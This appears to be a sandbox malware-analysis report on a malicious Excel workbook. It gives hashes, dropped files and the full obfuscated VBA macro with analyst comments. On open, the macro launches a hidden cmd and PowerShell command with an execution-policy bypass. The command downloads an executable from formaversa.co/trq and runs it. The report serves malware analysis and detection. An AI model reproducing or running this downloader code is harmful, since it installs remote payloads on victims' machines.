23bd91a7...5d77 | Files
VTI SCORE: 92/100
Target: win7_64_sp1-mso2016 | ms_office
Classification: -

23bd91a75b2e80556c099d5a4f57760a1e4d77e82ec38bbe9fc2e7ba17815d77 (SHA256)

23bd91a75b2e80556c099d5a4f57760a1e4d77e82ec38bbe9fc2e7ba17815d77.xls

Excel Document

Created at 2018-02-27 09:02:00

Files Information

Number of sample files submitted for analysis 1
Number of files created and extracted during analysis 5
Number of files modified and extracted during analysis 2
c:\users\aetadzjz\desktop\23bd91a75b2e80556c099d5a4f57760a1e4d77e82ec38bbe9fc2e7ba17815d77.xls
»
File Properties
Names c:\users\aetadzjz\desktop\23bd91a75b2e80556c099d5a4f57760a1e4d77e82ec38bbe9fc2e7ba17815d77.xls (Sample File)
Size 71.50 KB
Hash Values MD5: c1ed750dbde931c33e7006deb793a3a5
SHA1: 538d876cc756aea23f37712b8716efe879a3feee
SHA256: 23bd91a75b2e80556c099d5a4f57760a1e4d77e82ec38bbe9fc2e7ba17815d77
Actions
VBA Information
»
VBA Properties
Module Count 1
Macro Count 10
ThisWorkbook.cls - Eventless
»
' Returns a single double-quote character (Chr(34)).
' bigtowerstone concatenates it into the command line so that no literal
' quote appears next to the PowerShell fragment in the macro source.
Function gabrilla()
gabrilla = Chr(34)
End Function
' Returns an environment-variable name, either "temp" or "localappdata",
' selected by the 0/1 value from depminng. bigtowerstone wraps the result
' in % signs to form the drop path.
' NOTE(review): index 0 assumes the default zero-based Array(); no Option Base
' statement is visible in this listing.
Function goldgoldtime()
capponecheese = "em"
' Left("calamander", 4) yields "cala"
virtoserer = Left("calamander", 4)
' Resolves to Array("temp", "localappdata")
brucegodd = Array("t" + capponecheese + "p", "lo" + virtoserer + "ppd" + "ata")
' depminng is evaluated on every call, so separate calls may return different names
goldgoldtime = brucegodd(depminng)
End Function
' Returns the fragment  d   /c"  (padding spaces, the /c switch and an opening
' double quote). bigtowerstone prefixes it with "cM", which gives a mixed-case
' "cMd   /c" command-interpreter invocation.
Function ramzessii()
ramzessii = "" + "d   " + "/c" + Chr(34)
End Function
' Returns "exe": Left("multiplexed", 10) is "multiplexe" and its last three
' characters are "exe". Used by bigtowerstone as the dropped file's extension,
' so the string ".exe" never appears literally in the macro.
Function SingleSong()
SingleSong = Right(Left("multiplexed", 10), 3)
End Function

' Returns a pseudo-random integer, 0 or 1. goldgoldtime uses it as an array
' index to pick between the two environment-variable names.
Function depminng()
' Reseed the VBA random-number generator before drawing
Randomize
' Rnd is in [0, 1), so Int(Rnd * 2) is 0 or 1
depminng = Int(Rnd * 2#)
End Function

' Assembles the full command line that Workbook_Open passes to Shell.
'
' Analyst decode of the pieces concatenated below:
'   - "cM" + ramzessii            -> cmd /c with an opening quote
'   - nugahoneys                  -> mixed-case PowerShell launcher and flags
'   - the -f format strings       -> new-object, system.net.webclient, start-process
'   - 'd'+'o'+'w'+'n'+... + "l'+'e'" -> the method name downloadfile
'   - Left("Invisible", 3) + "oke" -> Invoke
'   - fatalerrrrord + "ps://..."  -> hxxps://formaversa[.]co/trq (defanged here)
'   - "%" + goldgoldtime + "%." + SingleSong -> %temp%.exe or %localappdata%.exe
'
' Resulting behaviour: a do/while(!$?) loop sleeps 25, attempts the WebClient
' download to the drop path, and repeats until the call succeeds; the drop path
' is then handed to start-process.
'
' Because there is no backslash between the %...% variable and ".exe", the path
' expands next to the directory rather than inside it; the report's created
' file c:\users\aetadzjz\appdata\local.exe matches the %localappdata% case.
' NOTE(review): goldgoldtime is called once for the download path and once for
' the start-process path, and each call picks its name independently, so the
' two paths are not guaranteed to be the same.
'
' Detection-relevant traits: Office spawning cmd and PowerShell, a hidden
' window, an execution-policy bypass, mixed-case tokens and -f string
' reordering used to defeat static string matching.
Function bigtowerstone()

' cmd wrapper, PowerShell launcher, opening quote, loop head, and the
' format string that reassembles "new-object"
nagilanile = "cM" + ramzessii + nugahoneys + gabrilla + "do{sl" + "eep 25;(." + "(\""{2" + "}{0" + "}{1" + "}\"" -" + "f'-" + "o','bj" + "ec" + "t','ne" + "w') (\""{"
copengagend = "'sy"
' Format string that reassembles "system.net.webclient", followed by the
' split-up "downloadfile" method name (rtypeoldschool supplies ")).(")
cryocamera = "1}{3}" + "{5}{" + "0}{2}{4}\"" -f'" + "t'," + copengagend + "st','.we" + "bclie','em','nt','.ne'" + rtypeoldschool + "'d" + "'+'o" + "w'+'n" + "lo" + "ad" + "fi"
' Invoke(url, drop path), loop tail, then the reassembled "start-process" on the drop path
bigtowerstone = nagilanile + cryocamera + "l'+'e')." + Left("Invisible", 3) + "oke('" + fatalerrrrord + "ps://formaversa.co/trq','%" + goldgoldtime + "%." + SingleSong + "')}while(!$?);&(\""{0}{2}{1}\""-f'star','ss','t-proce') '%" + goldgoldtime + "%." + SingleSong + "'" + Chr(34) + Chr(34)
End Function



' Builds the PowerShell launcher portion of the command line.
' The concatenation resolves to:
'   poweRSheLL  -NoniNTeRACtivE  -NoPr  -exeCuTi  ByPASS -WinDO  hIDDen
' i.e. PowerShell with abbreviated, mixed-case switches for non-interactive,
' no-profile, execution-policy bypass and hidden window.
' Each Array holds one meaningful string at the index read on the final line;
' the Now()/Minute()/Second() entries are never read and act only as filler.
Function nugahoneys()
babylongiland = Array(Now(), "eLL  " + "-N")
siniorengg = "owe"
fruitstornado = Array(Now(), siniorengg + "RS", Now(), Now())
portlanddomms = Array(Now(), Minute(Now), Minute(Now), "oP" + "r  " + "-e")

astralonfice = Array(Now(), "AS" + "S -W" + "i", Now())
valvegamess = Array(Second(Now), Now(), Now(), Now(), "RA" + "Ct")
olivergobane = "DDen  "
sisterloomg = Array(Now(), Minute(Now), Now(), Now(), "uT" + "i  B", Minute(Now), Now(), Now())
' Stitch the indexed fragments together; the token boundaries are deliberately
' placed mid-word so no switch name appears whole in the source
nugahoneys = "p" + fruitstornado(1) + "h" + babylongiland(1) + "on" + "iN" + "Te" + valvegamess(4) + "iv" + "E  -N" + portlanddomms(3) + "xeC" + sisterloomg(4) + "yP" + astralonfice(1) + "nD" + "O " + " hI" + olivergobane
End Function
' Returns "htt": Left("lighttight", 6) is "lightt" and its last three
' characters are "htt". bigtowerstone prepends it to "ps://..." so the URL
' scheme is not present as a contiguous literal in the macro.
Function fatalerrrrord()
fatalerrrrord = Right(Left("lighttight", 6), 3)
End Function
' Returns the punctuation fragment ")).(" that bigtowerstone places between the
' reassembled type name and the split-up method name.
Function rtypeoldschool()
' vegas is assigned but never read in this function
vegas = 0
tarapara = ").("
rtypeoldschool = ")" + tarapara
End Function
ThisWorkbook.cls - Open Workbook
»
' Auto-run entry point: Excel calls Workbook_Open when the workbook is opened
' with macros enabled. It passes the command line built by bigtowerstone to Shell.
' NOTE(review): Monochrome is not defined anywhere in the visible listing, so
' where the gating value comes from cannot be determined from this page.
' msoAlignLefts is an Office MsoAlignCmd constant with value 0; as Shell's
' window-style argument, 0 corresponds to a hidden window (vbHide).
Sub Workbook_Open()
If Monochrome > 0 Then
Shell bigtowerstone, msoAlignLefts
End If
End Sub
c:\users\aetadzjz\appdata\local\temp\cab618.tmp, ...
»
File Properties
Names c:\users\aetadzjz\appdata\local\temp\cab618.tmp (Created File)
c:\users\aetadzjz\appdata\local\temp\tar619.tmp (Created File)
c:\users\aetadzjz\appdata\local\temp\cab648.tmp (Created File)
c:\users\aetadzjz\appdata\local\temp\tar649.tmp (Created File)
c:\users\aetadzjz\appdata\local\temp\cab1c88.tmp (Created File)
c:\users\aetadzjz\appdata\local\temp\tar1c89.tmp (Created File)
c:\users\aetadzjz\appdata\local.exe (Created File)
Size 0.00 KB
Hash Values MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
c:\users\aetadzjz\appdata\local\temp\cab618.tmp, ...
»
File Properties
Names c:\users\aetadzjz\appdata\local\temp\cab618.tmp (Created File)
c:\users\aetadzjz\appdata\local\temp\cab648.tmp (Created File)
Size 52.71 KB
Hash Values MD5: 03f9e1f45c0d5fe8e08af7449ba1fa2f
SHA1: da545c3133a914434cce940bae78d8ad180a529a
SHA256: 677ffb54bd3cc0e2e66eccaf2f6e6c8e1050286516e4f2ef984a3a3673ccc311
Actions
c:\users\aetadzjz\appdata\local\temp\tar619.tmp, ...
»
File Properties
Names c:\users\aetadzjz\appdata\local\temp\tar619.tmp (Created File)
c:\users\aetadzjz\appdata\local\temp\tar649.tmp (Created File)
Size 126.77 KB
Hash Values MD5: 4479a52b31b6bde89384fb63854ec382
SHA1: 71386477836e4081befb501a266ccc4c984030e0
SHA256: 8c0f5d09cf41e38cf161b6cdd1c3a76cec845b7c11db267ab800edabf1a23fb2
Actions
c:\users\aetadzjz\appdata\locallow\microsoft\cryptneturlcache\metadata\94308059b57b3142e455b38a6eb92015
»
File Properties
Names c:\users\aetadzjz\appdata\locallow\microsoft\cryptneturlcache\metadata\94308059b57b3142e455b38a6eb92015 (Modified File)
Size 0.34 KB
Hash Values MD5: 2d48064647786eedd331a603b0f8b748
SHA1: e8bdcff6a839452bcc761c426bdc4f6943b6d146
SHA256: 5634802ae00b14fffb39497413115b8aad181cd8197985b9927769a9428c2df1
Actions
c:\users\aetadzjz\appdata\local\temp\cab1c88.tmp
»
File Properties
Names c:\users\aetadzjz\appdata\local\temp\cab1c88.tmp (Created File)
Size 52.75 KB
Hash Values MD5: 06ed9a39ac55eb00dd78e416e1a804f6
SHA1: 270464d1618197d86ff89184ba5ed45708d38bd9
SHA256: 298bba62caa0b61a402f715bb5b8d1d28ecd0b58d9a9b6b8ae7947b39da8b1eb
Actions
c:\users\aetadzjz\appdata\local\temp\tar1c89.tmp
»
File Properties
Names c:\users\aetadzjz\appdata\local\temp\tar1c89.tmp (Created File)
Size 126.95 KB
Hash Values MD5: 1dfe86c61a543b557903b5eef1e4fffd
SHA1: a67a046cbacff99f557462256a34b7672be70c0e
SHA256: 96e552c153dcfccf832a868a03390597606401829f96c64108df9d5874075355
Actions
c:\users\aetadzjz\appdata\locallow\microsoft\cryptneturlcache\metadata\94308059b57b3142e455b38a6eb92015
»
File Properties
Names c:\users\aetadzjz\appdata\locallow\microsoft\cryptneturlcache\metadata\94308059b57b3142e455b38a6eb92015 (Modified File)
Size 0.34 KB
Hash Values MD5: 97c682cd2695e7a9eb61f636441b3d8c
SHA1: 0e26e55e308ca2a2b8ef1dfe90b144118119475e
SHA256: 063bc9d0a4289cb971308cec32ee6064899fa08f8c91145a07289f085edd5c49
Actions